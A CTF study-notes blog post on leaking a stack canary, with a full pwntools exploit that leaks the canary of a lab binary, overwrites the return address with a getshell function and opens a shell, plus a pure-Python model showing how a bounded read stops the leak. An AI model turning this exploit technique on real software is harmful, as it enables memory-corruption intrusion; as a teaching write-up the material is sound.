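Learning pwn with ctf-wiki

Posted on 2019-02-25 | Updated on 2019-03-20 | Category: Binary security

Learning pwn with ctf-wiki (study notes)

canary

Leaking the canary on the stack

This one is fairly simple, so I'll just write the exp and walk through it.

```python
#!/usr/bin/env python
from pwn import *

context(os='linux', arch='i386', log_level='debug')

p = process('./ex2')
addr = ELF("./ex2").sym["getshell"]  # address of the getshell function in the binary

p.recvuntil(b"Hello Hacker!\n")

# First input: fill the 100-byte buffer. sendline() appends "\n" (0x0a),
# which lands on the canary's low byte (normally 0x00), so the echoed
# string runs on into the canary.
payload = b"A" * 100
p.sendline(payload)
p.recvuntil(b"A" * 100)

# The 4 bytes after the padding are the canary with its low byte set to 0x0a;
# subtracting 0xa restores the original 0x00.
canary = u32(p.recv(4)) - 0xa

# Second input: padding, the intact canary, 12 more bytes of padding up to the
# saved return address, then the address of getshell.
payload = b"A" * 100 + p32(canary) + b"A" * 12 + p32(addr)
p.send(payload)
p.recv()
p.interactive()
```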
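Why the exp subtracts 0xa, and what a bounded read changes, as an added example that is not part of the original post. The frame layout, the `CANARY` value and the functions `unbounded_read`, `bounded_read` and `echo_as_string` are assumptions that model the target in pure Python; they are not the source of ex2.

```python
import struct

BUF_SIZE = 100        # buffer length implied by the "A"*100 padding in the exp
CANARY = 0x5EC0DE00   # constructed sample value; the low byte is 0x00 by design

def make_frame() -> bytearray:
    # Modelled frame: [ 100-byte buffer | 4-byte little-endian canary ]
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<I", CANARY))

def unbounded_read(frame: bytearray, data: bytes) -> None:
    # Vulnerable pattern (assumed): copies whatever arrives, ignoring BUF_SIZE.
    frame[:len(data)] = data

def bounded_read(frame: bytearray, data: bytes) -> None:
    # Hardened pattern: at most BUF_SIZE - 1 bytes, always NUL-terminated.
    data = data[:BUF_SIZE - 1]
    frame[:len(data)] = data
    frame[len(data)] = 0

def echo_as_string(frame: bytearray) -> bytes:
    # What a C string print emits: everything up to the first NUL byte.
    end = frame.find(b"\x00")
    return bytes(frame if end < 0 else frame[:end])

def leaked_canary(output: bytes):
    # Recover the canary the way the exp does; None if the echo stopped early.
    tail = output[BUF_SIZE:BUF_SIZE + 4]
    if len(tail) < 4:
        return None
    return struct.unpack("<I", tail)[0] - 0x0A

def run(read_fn, data: bytes):
    # One read followed by one echo, on a fresh frame.
    frame = make_frame()
    read_fn(frame, data)
    return leaked_canary(echo_as_string(frame))

if __name__ == "__main__":
    line = b"A" * 100 + b"\n"   # the bytes sendline() puts on the wire
    print("unbounded read leaks:", run(unbounded_read, line))
    print("bounded read leaks:  ", run(bounded_read, line))
    # Input that exactly fits: the canary's own NUL byte stops the echo.
    print("exact fit leaks:     ", run(unbounded_read, b"A" * 99 + b"\n"))
```

The canary's zero low byte only protects it while that byte stays intact; once the read is bounded and the buffer is always terminated, the echo never reaches the canary.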